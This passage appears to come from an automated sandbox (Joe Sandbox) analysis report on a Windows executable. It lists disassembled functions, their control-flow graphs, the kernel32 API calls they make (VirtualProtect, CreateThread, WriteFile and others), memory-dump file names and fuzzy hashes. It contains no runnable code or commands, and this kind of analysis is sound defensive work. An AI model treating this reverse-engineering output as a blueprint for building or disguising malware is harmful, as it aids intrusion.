                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,0000000006:1@0000000005:@), ref: 006EEC16
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressAllocConsoleCreateFreeHandleModuleObjectProcSingleThreadVirtualWait
                                                                                                                                                                                                                                                                  • String ID: 0000000006:1@0000000005:@$VirtualProtect$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 2989586790-2246029265
                                                                                                                                                                                                                                                                  • Opcode ID: 2a195d75f6cea44e91ae30ab54362832699468551893f8bc18d16337f36c9fe3
                                                                                                                                                                                                                                                                  • Instruction ID: 6604c67fc67e324d98ca5b25df3a4d5082146d4499daea7de914f1c509ade399
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a195d75f6cea44e91ae30ab54362832699468551893f8bc18d16337f36c9fe3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB3180B0E41308AFEB54EFA0DC56BED7BB6EB09710F104519F5027A2D1DB795900CBA8
                                                                                                                                                                                                                                                                  Function 006EEC80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00004A48,00000000,00000000,00000000), ref: 006EECA2
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006EECB1
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 006EECD7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateExitObjectProcessSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID: sIasnnfbnxhbsAUie
                                                                                                                                                                                                                                                                  • API String ID: 2188141102-1345390032
                                                                                                                                                                                                                                                                  • Opcode ID: 66f87ea0754f0b43d9baa3574aadc7011968359169e4bcd65a79f48a8990a99d
                                                                                                                                                                                                                                                                  • Instruction ID: 8fc10aa3ab4a6e45898e671a9a361680e0c969213da468b67f650bf0485017a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f87ea0754f0b43d9baa3574aadc7011968359169e4bcd65a79f48a8990a99d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF06C74BC4304B7EB506BB4AC07F1C7A656705B11F504119F604B61D1D7B86404875D
                                                                                                                                                                                                                                                                  Function 006D0AD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 53 6d0ad8-6d0afa 54 6d0b00-6d0b12 GetCPInfo 53->54 55 6d0c13-6d0c39 53->55 54->55 57 6d0b18-6d0b1f 54->57 56 6d0c3e-6d0c43 55->56 59 6d0c4d-6d0c53 56->59 60 6d0c45-6d0c4b 56->60 58 6d0b21-6d0b2b 57->58 58->58 61 6d0b2d-6d0b40 58->61 63 6d0c5f 59->63 64 6d0c55-6d0c58 59->64 62 6d0c5b-6d0c5d 60->62 65 6d0b61-6d0b63 61->65 66 6d0c61-6d0c73 62->66 63->66 64->62 67 6d0b65-6d0b9c call 6312d0 call 6360e1 65->67 68 6d0b42-6d0b49 65->68 66->56 69 6d0c75-6d0c83 call 63320b 66->69 79 6d0ba1-6d0bd6 call 6360e1 67->79 70 6d0b58-6d0b5a 68->70 74 6d0b5c-6d0b5f 70->74 75 6d0b4b-6d0b4d 70->75 74->65 75->74 77 6d0b4f-6d0b57 75->77 77->70 82 6d0bd8-6d0be2 79->82 83 6d0be4-6d0bee 82->83 84 6d0bf0-6d0bf2 82->84 85 6d0c02-6d0c0f 83->85 86 6d0bf4-6d0bfe 84->86 87 6d0c00 84->87 85->82 88 6d0c11 85->88 86->85 87->85 88->69
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(0000FDE9,?), ref: 006D0B0A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 6d62ad40aeb3db789360c5fec2a3225ea63243e2c7eb0034d35fd64843193caf
                                                                                                                                                                                                                                                                  • Instruction ID: c2cb51c2a4e21d63522f1695da846513237f479bae30d5e2d22f1ad2710a5696
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d62ad40aeb3db789360c5fec2a3225ea63243e2c7eb0034d35fd64843193caf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B516D719081589AEB218F28CD84BF67BBDEB45304F2406EFE49AC7242C3319D46DF20
                                                                                                                                                                                                                                                                  Function 006C6327 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 89 6c6327-6c6346 90 6c634c-6c634e 89->90 91 6c6520 89->91 92 6c637a-6c63a0 90->92 93 6c6350-6c636f call 633fd5 90->93 94 6c6522-6c6526 91->94 96 6c63a6-6c63ac 92->96 97 6c63a2-6c63a4 92->97 100 6c6372-6c6375 93->100 96->93 99 6c63ae-6c63b8 96->99 97->96 97->99 101 6c63c8-6c63d3 call 6c5d35 99->101 102 6c63ba-6c63c5 call 634453 99->102 100->94 107 6c6415-6c6427 101->107 108 6c63d5-6c63da 101->108 102->101 111 6c6478-6c6498 WriteFile 107->111 112 6c6429-6c642f 107->112 109 6c63dc-6c63e0 108->109 110 6c63ff-6c6413 call 6c57ed 108->110 113 6c64e8-6c64fa 109->113 114 6c63e6-6c63f5 call 6c5cb3 109->114 132 6c63f8-6c63fa 110->132 116 6c649a-6c64a0 GetLastError 111->116 117 6c64a3 111->117 118 6c6466-6c6471 call 6c5dd2 112->118 119 6c6431-6c6434 112->119 122 6c64fc-6c6502 113->122 123 6c6504-6c6516 113->123 114->132 116->117 127 6c64a6-6c64b1 117->127 131 6c6476 118->131 120 6c6454-6c6464 call 6c6006 119->120 121 6c6436-6c6439 119->121 137 6c644f-6c6452 120->137 121->113 128 6c643f-6c644a call 6c5ee3 121->128 122->91 122->123 123->100 133 6c651b-6c651e 127->133 134 6c64b3-6c64b8 127->134 128->137 131->137 132->127 133->94 138 6c64ba-6c64bf 134->138 139 6c64e6 134->139 137->132 140 6c64d8-6c64e1 call 632b12 138->140 141 6c64c1-6c64d3 138->141 139->113 140->100 141->100
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 006C57ED: GetConsoleOutputCP.KERNEL32(763EDE73), ref: 006C5850
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 006C6490
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006C649A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                  • Opcode ID: b16b61f23456725b40941f6e7d18f9c986755b044d1615c03734dba7c08c67c3
                                                                                                                                                                                                                                                                  • Instruction ID: 438cb901b50a6cfd47730bfd952ea7b6bc979ba2be855877a9ca9ed7ac5e2d25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b16b61f23456725b40941f6e7d18f9c986755b044d1615c03734dba7c08c67c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B618B71904249AEDF15CFA8C844FFEBBBAEF0A314F14809DF805A7252D331D9428B69
                                                                                                                                                                                                                                                                  Function 006D1048 Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 144 6d1048-6d1070 call 6d09ad 147 6d1238-6d1239 call 6d0a5d 144->147 148 6d1076-6d107c 144->148 151 6d123e-6d1240 147->151 150 6d107f-6d1085 148->150 152 6d108b-6d1097 150->152 153 6d1187-6d11a6 call 6332d8 150->153 154 6d1241-6d124f call 63320b 151->154 152->150 155 6d1099-6d109f 152->155 161 6d11a9-6d11ae 153->161 159 6d117f-6d1182 155->159 160 6d10a5-6d10b1 IsValidCodePage 155->160 159->154 160->159 163 6d10b7-6d10be 160->163 164 6d11eb-6d11f5 161->164 165 6d11b0-6d11b5 161->165 166 6d10e6-6d10f3 GetCPInfo 163->166 167 6d10c0-6d10cc 163->167 164->161 170 6d11f7-6d1221 call 6d095a 164->170 168 6d11e8 165->168 169 6d11b7-6d11bf 165->169 172 6d10f5-6d1114 call 6332d8 166->172 173 6d1173-6d1179 166->173 171 6d10d0-6d10dc call 6d0ad8 167->171 168->164 174 6d11c1-6d11c4 169->174 175 6d11e0-6d11e6 169->175 185 6d1222-6d1231 170->185 182 6d10e1 171->182 172->171 183 6d1116-6d111d 172->183 173->147 173->159 180 6d11c6-6d11cc 174->180 175->165 175->168 180->175 184 6d11ce-6d11de 180->184 182->151 186 6d111f-6d1124 183->186 187 6d1149-6d114c 183->187 184->175 184->180 185->185 188 6d1233 185->188 186->187 189 6d1126-6d112e 186->189 190 6d1151-6d1158 187->190 188->147 191 6d1141-6d1147 189->191 192 6d1130-6d1137 189->192 190->190 193 6d115a-6d116e call 6d095a 190->193 191->186 191->187 194 6d1138-6d113f 192->194 193->171 194->191 194->194
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 006D09AD: GetOEMCP.KERNEL32(00000000), ref: 006D09D8
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030), ref: 006D10A9
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,?), ref: 006D10EB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                                                                                                                                                  • Opcode ID: b22bdefe8fc8712b229f85815673ab5017a14bc0ef83914389b9c4521b792839
                                                                                                                                                                                                                                                                  • Instruction ID: 8134657111f9caf610890325347f9d3471c3f1cbca36b62473aaedd225a6341b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b22bdefe8fc8712b229f85815673ab5017a14bc0ef83914389b9c4521b792839
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B51F370E00245AEDB20DF75C8816EABBF6EF86300F18816FD1968A751D7B59A46CB90
                                                                                                                                                                                                                                                                  Function 006C5DD2 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 197 6c5dd2-6c5e27 call 631e42 200 6c5e9c-6c5eac call 63320b 197->200 201 6c5e29 197->201 203 6c5e2f 201->203 205 6c5e35-6c5e37 203->205 206 6c5e39-6c5e3e 205->206 207 6c5e51-6c5e76 WriteFile 205->207 208 6c5e47-6c5e4f 206->208 209 6c5e40-6c5e46 206->209 210 6c5e78-6c5e83 207->210 211 6c5e94-6c5e9a GetLastError 207->211 208->205 208->207 209->208 210->200 212 6c5e85-6c5e90 210->212 211->200 212->203 213 6c5e92 212->213 213->200
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 006C5E6E
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006C5E94
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                  • Opcode ID: cffc50ef9627d5827b79c27a815a61ec85247ded109e34cf256a99be0d39777d
                                                                                                                                                                                                                                                                  • Instruction ID: ce5c2e7841b3cd00645d20e82575623c43464e7cbbe59ecea9d4e2498fc1a749
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cffc50ef9627d5827b79c27a815a61ec85247ded109e34cf256a99be0d39777d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF218234A002199BCB19CF19DC80AEDB7B6EB4D305F1484AEE906D7211D730EE86CB64
                                                                                                                                                                                                                                                                  Function 006C4CFC Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 214 6c4cfc-6c4d01 215 6c4d03-6c4d1b 214->215 216 6c4d1d-6c4d21 215->216 217 6c4d29-6c4d32 215->217 216->217 218 6c4d23-6c4d27 216->218 219 6c4d44 217->219 220 6c4d34-6c4d37 217->220 222 6c4d9e-6c4da2 218->222 221 6c4d46-6c4d53 GetStdHandle 219->221 223 6c4d39-6c4d3e 220->223 224 6c4d40-6c4d42 220->224 225 6c4d55-6c4d57 221->225 226 6c4d80-6c4d92 221->226 222->215 227 6c4da8-6c4dab 222->227 223->221 224->221 225->226 228 6c4d59-6c4d62 GetFileType 225->228 226->222 229 6c4d94-6c4d97 226->229 228->226 230 6c4d64-6c4d6d 228->230 229->222 231 6c4d6f-6c4d73 230->231 232 6c4d75-6c4d78 230->232 231->222 232->222 233 6c4d7a-6c4d7e 232->233 233->222
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006C4E09,00703910,0000000C), ref: 006C4D48
                                                                                                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006C4E09,00703910,0000000C), ref: 006C4D5A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
